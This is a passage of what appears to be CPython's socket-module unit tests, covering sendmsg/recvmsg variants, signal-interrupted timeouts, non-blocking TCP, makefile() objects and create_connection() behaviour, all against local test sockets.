@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
                            SendrecvmsgSCTPStreamTestBase):
    def testRecvmsgEOF(self):
        # SCTP sporadically reports ENOTCONN at EOF; treat that as a
        # skip rather than a failure (see issue #13876).
        try:
            super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
        except OSError as e:
            if e.errno != errno.ENOTCONN:
                raise
            self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
                                SendrecvmsgSCTPStreamTestBase):
    def testRecvmsgEOF(self):
        # Same ENOTCONN workaround as RecvmsgSCTPStreamTest above.
        try:
            super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
        except OSError as e:
            if e.errno != errno.ENOTCONN:
                raise
            self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
# Unix-domain stream sockets: generic suites plus the SCM_RIGHTS
# file-descriptor-passing tests, guarded on AF_UNIX availability.
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
                                    ConnectedStreamTestMixin, UnixStreamBase):
    pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
    pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
                            SendrecvmsgUnixStreamTestBase):
    pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
                                SendrecvmsgUnixStreamTestBase):
    pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
    pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
                                     SendrecvmsgUnixStreamTestBase):
    pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set.  These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
    # Base class for interrupted send/receive tests.  Installs a
    # SIGALRM handler that raises ZeroDivisionError (via 1/0), so an
    # interrupted socket call surfaces as that exception; the original
    # handler is restored on teardown, along with any scheduled
    # alarms.
    def setUp(self):
        super().setUp()
        orig_alrm_handler = signal.signal(signal.SIGALRM,
                                          lambda signum, frame: 1 / 0)
        self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
    # Timeout for socket operations
    timeout = 4.0
    # Provide setAlarm() method to schedule delivery of SIGALRM after
    # given number of seconds, or cancel it if zero, and an
    # appropriate time value to use.  Use setitimer() if available.
    if hasattr(signal, "setitimer"):
        alarm_time = 0.05
        def setAlarm(self, seconds):
            # Sub-second resolution alarm.
            signal.setitimer(signal.ITIMER_REAL, seconds)
    else:
        # Old systems may deliver the alarm up to one second early
        alarm_time = 2
        def setAlarm(self, seconds):
            # Whole-second alarm(2)-style fallback.
            signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
                     "Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
    # Test interrupting the recv*() methods with signals when a
    # timeout is set.
    def setUp(self):
        super().setUp()
        self.serv.settimeout(self.timeout)
    def checkInterruptedRecv(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs) raises ZeroDivisionError
        # (propagated from the SIGALRM handler installed by the base
        # class) when interrupted by a signal.
        try:
            self.setAlarm(self.alarm_time)
            with self.assertRaises(ZeroDivisionError) as cm:
                func(*args, **kwargs)
        finally:
            # Always cancel any pending alarm.
            self.setAlarm(0)
    def testInterruptedRecvTimeout(self):
        self.checkInterruptedRecv(self.serv.recv, 1024)
    def testInterruptedRecvIntoTimeout(self):
        self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
    def testInterruptedRecvfromTimeout(self):
        self.checkInterruptedRecv(self.serv.recvfrom, 1024)
    def testInterruptedRecvfromIntoTimeout(self):
        self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
    @requireAttrs(socket.socket, "recvmsg")
    def testInterruptedRecvmsgTimeout(self):
        self.checkInterruptedRecv(self.serv.recvmsg, 1024)
    @requireAttrs(socket.socket, "recvmsg_into")
    def testInterruptedRecvmsgIntoTimeout(self):
        self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
                     "Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
                                 ThreadSafeCleanupTestCase,
                                 SocketListeningTestMixin, TCPTestBase):
    # Test interrupting the interruptible send*() methods with signals
    # when a timeout is set.
    def setUp(self):
        super().setUp()
        self.serv_conn = self.newSocket()
        self.addCleanup(self.serv_conn.close)
        # Use a thread to complete the connection, but wait for it to
        # terminate before running the test, so that there is only one
        # thread to accept the signal.
        cli_thread = threading.Thread(target=self.doConnect)
        cli_thread.start()
        self.cli_conn, addr = self.serv.accept()
        self.addCleanup(self.cli_conn.close)
        cli_thread.join()
        self.serv_conn.settimeout(self.timeout)
    def doConnect(self):
        # Thread target: connect the client-side socket to the server.
        self.serv_conn.connect(self.serv_addr)
    def checkInterruptedSend(self, func, *args, **kwargs):
        # Check that func(*args, **kwargs), run in a loop, raises
        # ZeroDivisionError (propagated from the SIGALRM handler
        # installed by the base class) when interrupted by a signal.
        # The loop is needed because early sends may succeed before
        # the buffer fills and the call blocks.
        try:
            with self.assertRaises(ZeroDivisionError) as cm:
                while True:
                    self.setAlarm(self.alarm_time)
                    func(*args, **kwargs)
        finally:
            # Always cancel any pending alarm.
            self.setAlarm(0)
    # Issue #12958: The following tests have problems on OS X prior to 10.7
    @support.requires_mac_ver(10, 7)
    def testInterruptedSendTimeout(self):
        self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
    @support.requires_mac_ver(10, 7)
    def testInterruptedSendtoTimeout(self):
        # Passing an actual address here as Python's wrapper for
        # sendto() doesn't allow passing a zero-length one; POSIX
        # requires that the address is ignored since the socket is
        # connection-mode, however.
        self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
                                  self.serv_addr)
    @support.requires_mac_ver(10, 7)
    @requireAttrs(socket.socket, "sendmsg")
    def testInterruptedSendmsgTimeout(self):
        self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
    def testClose(self):
        # Server: accept and immediately close the connection; the
        # client should then become readable and recv() should return
        # b'' (EOF).
        conn, addr = self.serv.accept()
        conn.close()
        sd = self.cli
        read, write, err = select.select([sd], [], [], 1.0)
        self.assertEqual(read, [sd])
        self.assertEqual(sd.recv(1), b'')
        # Calling close() many times should be safe.
        conn.close()
        conn.close()
    def _testClose(self):
        # Client: connect and linger briefly so the server side can
        # run its assertions before the socket goes away.
        self.cli.connect((HOST, self.port))
        time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
    """Basic checks for socket.socketpair(): default family/type/proto
    and simple send/recv in both directions."""
    def __init__(self, methodName='runTest'):
        SocketPairTest.__init__(self, methodName=methodName)
    def _check_defaults(self, sock):
        # socketpair() defaults to AF_UNIX where available, AF_INET
        # otherwise, always SOCK_STREAM with proto 0.
        self.assertIsInstance(sock, socket.socket)
        if hasattr(socket, 'AF_UNIX'):
            self.assertEqual(sock.family, socket.AF_UNIX)
        else:
            self.assertEqual(sock.family, socket.AF_INET)
        self.assertEqual(sock.type, socket.SOCK_STREAM)
        self.assertEqual(sock.proto, 0)
    def _testDefaults(self):
        self._check_defaults(self.cli)
    def testDefaults(self):
        self._check_defaults(self.serv)
    def testRecv(self):
        msg = self.serv.recv(1024)
        self.assertEqual(msg, MSG)
    def _testRecv(self):
        self.cli.send(MSG)
    def testSend(self):
        self.serv.send(MSG)
    def _testSend(self):
        msg = self.cli.recv(1024)
        self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
    """Tests for setblocking()/settimeout() interaction and
    non-blocking accept/connect/recv on TCP sockets."""
    def __init__(self, methodName='runTest'):
        ThreadedTCPSocketTest.__init__(self, methodName=methodName)
    def testSetBlocking(self):
        # Testing whether set blocking works
        self.serv.setblocking(True)
        self.assertIsNone(self.serv.gettimeout())
        self.assertTrue(self.serv.getblocking())
        if fcntl:
            self.assertTrue(_is_fd_in_blocking_mode(self.serv))
        self.serv.setblocking(False)
        self.assertEqual(self.serv.gettimeout(), 0.0)
        self.assertFalse(self.serv.getblocking())
        if fcntl:
            self.assertFalse(_is_fd_in_blocking_mode(self.serv))
        # settimeout(None) restores blocking mode.
        self.serv.settimeout(None)
        self.assertTrue(self.serv.getblocking())
        if fcntl:
            self.assertTrue(_is_fd_in_blocking_mode(self.serv))
        # settimeout(0) is equivalent to setblocking(False).
        self.serv.settimeout(0)
        self.assertFalse(self.serv.getblocking())
        self.assertEqual(self.serv.gettimeout(), 0)
        if fcntl:
            self.assertFalse(_is_fd_in_blocking_mode(self.serv))
        self.serv.settimeout(10)
        self.assertTrue(self.serv.getblocking())
        self.assertEqual(self.serv.gettimeout(), 10)
        if fcntl:
            # When a Python socket has a non-zero timeout, it's
            # switched internally to a non-blocking mode.
            # Later, sock.sendall(), sock.recv(), and other socket
            # operations use a `select()` call and handle EWOULDBLOCK/EGAIN
            # on all socket operations.  That's how timeouts are
            # enforced.
            self.assertFalse(_is_fd_in_blocking_mode(self.serv))
        self.serv.settimeout(0)
        self.assertFalse(self.serv.getblocking())
        if fcntl:
            self.assertFalse(_is_fd_in_blocking_mode(self.serv))
        # A non-blocking accept() with no pending connection must
        # return (raise OSError) essentially immediately.
        start = time.time()
        try:
            self.serv.accept()
        except OSError:
            pass
        end = time.time()
        self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
    def _testSetBlocking(self):
        # No client-side activity needed.
        pass
    @support.cpython_only
    def testSetBlocking_overflow(self):
        # Issue 15989
        import _testcapi
        if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
            self.skipTest('needs UINT_MAX < ULONG_MAX')
        self.serv.setblocking(False)
        self.assertEqual(self.serv.gettimeout(), 0.0)
        # A large truthy value must behave like setblocking(True).
        self.serv.setblocking(_testcapi.UINT_MAX + 1)
        self.assertIsNone(self.serv.gettimeout())
    # Client-side counterpart for testSetBlocking_overflow (no-op).
    _testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
    @unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
                         'test needs socket.SOCK_NONBLOCK')
    @support.requires_linux_version(2, 6, 28)
    def testInitNonBlocking(self):
        # Sockets created with SOCK_NONBLOCK start out non-blocking.
        # reinit server socket
        self.serv.close()
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
                                                  socket.SOCK_NONBLOCK)
        self.assertFalse(self.serv.getblocking())
        self.assertEqual(self.serv.gettimeout(), 0)
        self.port = support.bind_port(self.serv)
        self.serv.listen()
        # actual testing
        start = time.time()
        try:
            self.serv.accept()
        except OSError:
            pass
        end = time.time()
        self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
    def _testInitNonBlocking(self):
        pass
    def testInheritFlags(self):
        # Issue #7995: when calling accept() on a listening socket with a
        # timeout, the resulting socket should not be non-blocking.
        # NOTE(review): if accept() itself raised (e.g. timed out),
        # `conn` would be unbound and the finally clause would raise
        # NameError — confirm whether that masking is acceptable here.
        self.serv.settimeout(10)
        try:
            conn, addr = self.serv.accept()
            message = conn.recv(len(MSG))
        finally:
            conn.close()
            self.serv.settimeout(None)
    def _testInheritFlags(self):
        # Delay, connect, delay again, then send so the server's
        # recv() happens on an established connection.
        time.sleep(0.1)
        self.cli.connect((HOST, self.port))
        time.sleep(0.5)
        self.cli.send(MSG)
    def testAccept(self):
        # Testing non-blocking accept
        self.serv.setblocking(0)
        # First accept() must fail: the client connects only after a
        # 0.1s delay.
        try:
            conn, addr = self.serv.accept()
        except OSError:
            pass
        else:
            self.fail("Error trying to do non-blocking accept.")
        read, write, err = select.select([self.serv], [], [])
        if self.serv in read:
            conn, addr = self.serv.accept()
            # Sockets accepted from a non-blocking listener default
            # to blocking mode (no timeout).
            self.assertIsNone(conn.gettimeout())
            conn.close()
        else:
            self.fail("Error trying to do accept after select.")
    def _testAccept(self):
        time.sleep(0.1)
        self.cli.connect((HOST, self.port))
    def testConnect(self):
        # Testing non-blocking connect
        conn, addr = self.serv.accept()
        conn.close()
    def _testConnect(self):
        self.cli.settimeout(10)
        self.cli.connect((HOST, self.port))
    def testRecv(self):
        # Testing non-blocking recv
        conn, addr = self.serv.accept()
        conn.setblocking(0)
        # First recv() must fail: the client sends only after a delay.
        try:
            msg = conn.recv(len(MSG))
        except OSError:
            pass
        else:
            self.fail("Error trying to do non-blocking recv.")
        read, write, err = select.select([conn], [], [])
        if conn in read:
            msg = conn.recv(len(MSG))
            conn.close()
            self.assertEqual(msg, MSG)
        else:
            self.fail("Error during select call to non-blocking socket.")
    def _testRecv(self):
        self.cli.connect((HOST, self.port))
        time.sleep(0.1)
        self.cli.send(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
    """Unit tests for the object returned by socket.makefile()
    self.read_file is the io object returned by makefile() on
    the client connection.  You can read from this file to
    get output from the server.
    self.write_file is the io object returned by makefile() on the
    server connection.  You can write to this file to send output
    to the client.
    """
    # Configuration knobs overridden by the subclasses below to vary
    # buffering and text/binary mode.
    bufsize = -1 # Use default buffer size
    encoding = 'utf-8'
    errors = 'strict'
    newline = None
    read_mode = 'rb'
    read_msg = MSG
    write_mode = 'wb'
    write_msg = MSG
    def __init__(self, methodName='runTest'):
        SocketConnectedTest.__init__(self, methodName=methodName)
    def setUp(self):
        # Events used to synchronise the server and client threads in
        # the non-blocking tests.
        self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
            threading.Event() for i in range(4)]
        SocketConnectedTest.setUp(self)
        self.read_file = self.cli_conn.makefile(
            self.read_mode, self.bufsize,
            encoding = self.encoding,
            errors = self.errors,
            newline = self.newline)
    def tearDown(self):
        self.serv_finished.set()
        self.read_file.close()
        self.assertTrue(self.read_file.closed)
        self.read_file = None
        SocketConnectedTest.tearDown(self)
    def clientSetUp(self):
        SocketConnectedTest.clientSetUp(self)
        self.write_file = self.serv_conn.makefile(
            self.write_mode, self.bufsize,
            encoding = self.encoding,
            errors = self.errors,
            newline = self.newline)
    def clientTearDown(self):
        self.cli_finished.set()
        self.write_file.close()
        self.assertTrue(self.write_file.closed)
        self.write_file = None
        SocketConnectedTest.clientTearDown(self)
    def testReadAfterTimeout(self):
        # Issue #7322: A file object must disallow further reads
        # after a timeout has occurred.
        self.cli_conn.settimeout(1)
        self.read_file.read(3)
        # First read raises a timeout
        self.assertRaises(socket.timeout, self.read_file.read, 1)
        # Second read is disallowed
        with self.assertRaises(OSError) as ctx:
            self.read_file.read(1)
        self.assertIn("cannot read from timed out object", str(ctx.exception))
    def _testReadAfterTimeout(self):
        # Send only 3 bytes, then hold the connection open so the
        # server's second read times out.
        self.write_file.write(self.write_msg[0:3])
        self.write_file.flush()
        self.serv_finished.wait()
    def testSmallRead(self):
        # Performing small file read test
        first_seg = self.read_file.read(len(self.read_msg)-3)
        second_seg = self.read_file.read(3)
        msg = first_seg + second_seg
        self.assertEqual(msg, self.read_msg)
    def _testSmallRead(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()
    def testFullRead(self):
        # read until EOF
        msg = self.read_file.read()
        self.assertEqual(msg, self.read_msg)
    def _testFullRead(self):
        # Close after writing so the server's read() sees EOF.
        self.write_file.write(self.write_msg)
        self.write_file.close()
    def testUnbufferedRead(self):
        # Performing unbuffered file read test: one byte/char at a
        # time until EOF.
        buf = type(self.read_msg)()
        while 1:
            char = self.read_file.read(1)
            if not char:
                break
            buf += char
        self.assertEqual(buf, self.read_msg)
    def _testUnbufferedRead(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()
    def testReadline(self):
        # Performing file readline test
        line = self.read_file.readline()
        self.assertEqual(line, self.read_msg)
    def _testReadline(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()
    def testCloseAfterMakefile(self):
        # The file returned by makefile should keep the socket open.
        self.cli_conn.close()
        # read until EOF
        msg = self.read_file.read()
        self.assertEqual(msg, self.read_msg)
    def _testCloseAfterMakefile(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()
    def testMakefileAfterMakefileClose(self):
        # Closing the file object must not close the underlying
        # socket; recv() on it still works.
        self.read_file.close()
        msg = self.cli_conn.recv(len(MSG))
        if isinstance(self.read_msg, str):
            msg = msg.decode()
        self.assertEqual(msg, self.read_msg)
    def _testMakefileAfterMakefileClose(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()
    def testClosedAttr(self):
        self.assertTrue(not self.read_file.closed)
    def _testClosedAttr(self):
        self.assertTrue(not self.write_file.closed)
    def testAttributes(self):
        # makefile() objects expose the mode and the socket's fd as
        # their name.
        self.assertEqual(self.read_file.mode, self.read_mode)
        self.assertEqual(self.read_file.name, self.cli_conn.fileno())
    def _testAttributes(self):
        self.assertEqual(self.write_file.mode, self.write_mode)
        self.assertEqual(self.write_file.name, self.serv_conn.fileno())
    def testRealClose(self):
        # After close(), fileno() raises; after closing the socket
        # too, socket operations raise OSError.
        self.read_file.close()
        self.assertRaises(ValueError, self.read_file.fileno)
        self.cli_conn.close()
        self.assertRaises(OSError, self.cli_conn.getsockname)
    def _testRealClose(self):
        pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
    """Repeat the tests from FileObjectClassTestCase with bufsize==0.
    In this case (and in this case only), it should be possible to
    create a file object, read a line from it, create another file
    object, read another line from it, without loss of data in the
    first file object's buffer.  Note that http.client relies on this
    when reading multiple requests from the same socket."""
    bufsize = 0 # Use unbuffered mode
    def testUnbufferedReadline(self):
        # Read a line, create a new file object, read another line with it
        line = self.read_file.readline() # first line
        self.assertEqual(line, b"A. " + self.write_msg) # first line
        self.read_file = self.cli_conn.makefile('rb', 0)
        line = self.read_file.readline() # second line
        self.assertEqual(line, b"B. " + self.write_msg) # second line
    def _testUnbufferedReadline(self):
        self.write_file.write(b"A. " + self.write_msg)
        self.write_file.write(b"B. " + self.write_msg)
        self.write_file.flush()
    def testMakefileClose(self):
        # The file returned by makefile should keep the socket open...
        self.cli_conn.close()
        msg = self.cli_conn.recv(1024)
        self.assertEqual(msg, self.read_msg)
        # ...until the file is itself closed
        self.read_file.close()
        self.assertRaises(OSError, self.cli_conn.recv, 1024)
    def _testMakefileClose(self):
        self.write_file.write(self.write_msg)
        self.write_file.flush()
    def testMakefileCloseSocketDestroy(self):
        # Closing the file object must drop exactly one reference to
        # the socket.
        refcount_before = sys.getrefcount(self.cli_conn)
        self.read_file.close()
        refcount_after = sys.getrefcount(self.cli_conn)
        self.assertEqual(refcount_before - 1, refcount_after)
    def _testMakefileCloseSocketDestroy(self):
        pass
    # Non-blocking ops
    # NOTE: to set `read_file` as non-blocking, we must call
    # `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
    def testSmallReadNonBlocking(self):
        self.cli_conn.setblocking(False)
        # With no data available, reads return None rather than block.
        self.assertEqual(self.read_file.readinto(bytearray(10)), None)
        self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
        # Signal the client to write, then wait for it.
        self.evt1.set()
        self.evt2.wait(1.0)
        first_seg = self.read_file.read(len(self.read_msg) - 3)
        if first_seg is None:
            # Data not arrived (can happen under Windows), wait a bit
            time.sleep(0.5)
            first_seg = self.read_file.read(len(self.read_msg) - 3)
        buf = bytearray(10)
        n = self.read_file.readinto(buf)
        self.assertEqual(n, 3)
        msg = first_seg + buf[:n]
        self.assertEqual(msg, self.read_msg)
        # Everything consumed; further reads return None again.
        self.assertEqual(self.read_file.readinto(bytearray(16)), None)
        self.assertEqual(self.read_file.read(1), None)
    def _testSmallReadNonBlocking(self):
        self.evt1.wait(1.0)
        self.write_file.write(self.write_msg)
        self.write_file.flush()
        self.evt2.set()
        # Avoid closing the socket before the server test has finished,
        # otherwise system recv() will return 0 instead of EWOULDBLOCK.
        self.serv_finished.wait(5.0)
    def testWriteNonBlocking(self):
        self.cli_finished.wait(5.0)
        # The client thread can't skip directly - the SkipTest exception
        # would appear as a failure.
        if self.serv_skipped:
            self.skipTest(self.serv_skipped)
    def _testWriteNonBlocking(self):
        self.serv_skipped = None
        self.serv_conn.setblocking(False)
        # Try to saturate the socket buffer pipe with repeated large writes.
        BIG = b"x" * support.SOCK_MAX_SIZE
        LIMIT = 10
        # The first write() succeeds since a chunk of data can be buffered
        n = self.write_file.write(BIG)
        self.assertGreater(n, 0)
        for i in range(LIMIT):
            n = self.write_file.write(BIG)
            if n is None:
                # Succeeded
                break
            self.assertGreater(n, 0)
        else:
            # Let us know that this test didn't manage to establish
            # the expected conditions.  This is not a failure in itself but,
            # if it happens repeatedly, the test should be fixed.
            self.serv_skipped = "failed to saturate the socket buffer"
# Variants of FileObjectClassTestCase exercising other buffer sizes
# and text-mode combinations via the class-level knobs.
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
    bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
    bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
    """Tests for socket.makefile() in text mode (rather than binary)"""
    # Text-mode reader, binary writer.
    read_mode = 'r'
    read_msg = MSG.decode('utf-8')
    write_mode = 'wb'
    write_msg = MSG
    newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
    """Tests for socket.makefile() in text mode (rather than binary)"""
    # Binary reader, text-mode writer.
    read_mode = 'rb'
    read_msg = MSG
    write_mode = 'w'
    write_msg = MSG.decode('utf-8')
    newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
    """Tests for socket.makefile() in text mode (rather than binary)"""
    # Text mode on both ends.
    read_mode = 'r'
    read_msg = MSG.decode('utf-8')
    write_mode = 'w'
    write_msg = MSG.decode('utf-8')
    newline = ''
class NetworkConnectionTest(object):
    """Mixin that makes the client connect via socket.create_connection()."""
    def clientSetUp(self):
        # self.port is provided by BasicTCPTest, which our concrete
        # subclass BasicTCPTest2 (below) also inherits.
        conn = socket.create_connection((HOST, self.port))
        self.cli = conn
        self.serv_conn = conn
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
    """Tests that NetworkConnection does not break existing TCP functionality.
    """
class NetworkConnectionNoServer(unittest.TestCase):
    """Error behaviour of connect()/create_connection() when no server
    is listening."""
    class MockSocket(socket.socket):
        # Stand-in whose connect() always times out.
        def connect(self, *args):
            raise socket.timeout('timed out')
    @contextlib.contextmanager
    def mocked_socket_module(self):
        """Return a socket which times out on connect"""
        old_socket = socket.socket
        socket.socket = self.MockSocket
        try:
            yield
        finally:
            # Always restore the real socket class.
            socket.socket = old_socket
    def test_connect(self):
        # Connecting to an unused port must fail with ECONNREFUSED.
        port = support.find_unused_port()
        cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.addCleanup(cli.close)
        with self.assertRaises(OSError) as cm:
            cli.connect((HOST, port))
        self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
    def test_create_connection(self):
        # Issue #9792: errors raised by create_connection() should have
        # a proper errno attribute.
        port = support.find_unused_port()
        with self.assertRaises(OSError) as cm:
            socket.create_connection((HOST, port))
        # Issue #16257: create_connection() calls getaddrinfo() against
        # 'localhost'.  This may result in an IPV6 addr being returned
        # as well as an IPV4 one:
        # >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
        # >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
        #       (26, 2, 0, '', ('::1', 41230, 0, 0))]
        #
        # create_connection() enumerates through all the addresses returned
        # and if it doesn't successfully bind to any of them, it propagates
        # the last exception it encountered.
        #
        # On Solaris, ENETUNREACH is returned in this circumstance instead
        # of ECONNREFUSED.  So, if that errno exists, add it to our list of
        # expected errnos.
        expected_errnos = [ errno.ECONNREFUSED, ]
        if hasattr(errno, 'ENETUNREACH'):
            expected_errnos.append(errno.ENETUNREACH)
        if hasattr(errno, 'EADDRNOTAVAIL'):
            # bpo-31910: socket.create_connection() fails randomly
            # with EADDRNOTAVAIL on Travis CI
            expected_errnos.append(errno.EADDRNOTAVAIL)
        self.assertIn(cm.exception.errno, expected_errnos)
    def test_create_connection_timeout(self):
        # Issue #9792: create_connection() should not recast timeout errors
        # as generic socket errors.
        with self.mocked_socket_module():
            with self.assertRaises(socket.timeout):
                socket.create_connection((HOST, 1234))
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
    """Check attributes (family, timeout, source address) of sockets
    returned by socket.create_connection().

    The server side of every test is ``_justAccept``: accept exactly one
    connection and drop it; the paired ``_test*`` client methods perform
    the actual assertions.
    """

    def __init__(self, methodName='runTest'):
        SocketTCPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        self.source_port = support.find_unused_port()

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)

    def _justAccept(self):
        # Minimal server behaviour shared by all tests in this class.
        conn, addr = self.serv.accept()
        conn.close()

    testFamily = _justAccept
    def _testFamily(self):
        self.cli = socket.create_connection((HOST, self.port), timeout=30)
        self.addCleanup(self.cli.close)
        # HOST is an IPv4 address, so the connected socket must be AF_INET.
        # Use the named constant rather than the magic number 2.
        self.assertEqual(self.cli.family, socket.AF_INET)

    testSourceAddress = _justAccept
    def _testSourceAddress(self):
        self.cli = socket.create_connection((HOST, self.port), timeout=30,
                source_address=('', self.source_port))
        self.addCleanup(self.cli.close)
        self.assertEqual(self.cli.getsockname()[1], self.source_port)
        # The port number being used is sufficient to show that the bind()
        # call happened.

    testTimeoutDefault = _justAccept
    def _testTimeoutDefault(self):
        # passing no explicit timeout uses socket's global default
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(42)
        try:
            self.cli = socket.create_connection((HOST, self.port))
            self.addCleanup(self.cli.close)
        finally:
            socket.setdefaulttimeout(None)
        self.assertEqual(self.cli.gettimeout(), 42)

    testTimeoutNone = _justAccept
    def _testTimeoutNone(self):
        # None timeout means the same as sock.settimeout(None)
        self.assertTrue(socket.getdefaulttimeout() is None)
        socket.setdefaulttimeout(30)
        try:
            self.cli = socket.create_connection((HOST, self.port), timeout=None)
            self.addCleanup(self.cli.close)
        finally:
            socket.setdefaulttimeout(None)
        self.assertEqual(self.cli.gettimeout(), None)

    testTimeoutValueNamed = _justAccept
    def _testTimeoutValueNamed(self):
        self.cli = socket.create_connection((HOST, self.port), timeout=30)
        # Close the socket like every other test here does (was missing).
        self.addCleanup(self.cli.close)
        self.assertEqual(self.cli.gettimeout(), 30)

    testTimeoutValueNonamed = _justAccept
    def _testTimeoutValueNonamed(self):
        self.cli = socket.create_connection((HOST, self.port), 30)
        self.addCleanup(self.cli.close)
        self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
    """Timeout behaviour of sockets made by socket.create_connection()."""

    def __init__(self, methodName='runTest'):
        SocketTCPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        pass

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)

    def testInsideTimeout(self):
        # Server side: delay long enough that a 1-second client timeout
        # (testOutsideTimeout) fires, but a client with no timeout
        # (testInsideTimeout) still gets the data.
        conn, addr = self.serv.accept()
        self.addCleanup(conn.close)
        time.sleep(3)
        conn.send(b"done!")
    testOutsideTimeout = testInsideTimeout

    def _testInsideTimeout(self):
        self.cli = sock = socket.create_connection((HOST, self.port))
        data = sock.recv(5)
        self.assertEqual(data, b"done!")

    def _testOutsideTimeout(self):
        self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
        self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
    """Timeout behaviour of blocking calls on a listening TCP socket."""

    def testTCPTimeout(self):
        def raise_timeout(*args, **kwargs):
            self.serv.settimeout(1.0)
            self.serv.accept()
        self.assertRaises(socket.timeout, raise_timeout,
                          "Error generating a timeout exception (TCP)")

    def testTimeoutZero(self):
        # A timeout of 0 puts the socket in non-blocking mode: accept()
        # with no pending connection must raise OSError immediately,
        # not socket.timeout.
        ok = False
        try:
            self.serv.settimeout(0.0)
            foo = self.serv.accept()
        except socket.timeout:
            self.fail("caught timeout instead of error (TCP)")
        except OSError:
            ok = True
        except:
            self.fail("caught unexpected exception (TCP)")
        if not ok:
            self.fail("accept() returned success when we did not expect it")

    @unittest.skipUnless(hasattr(signal, 'alarm'),
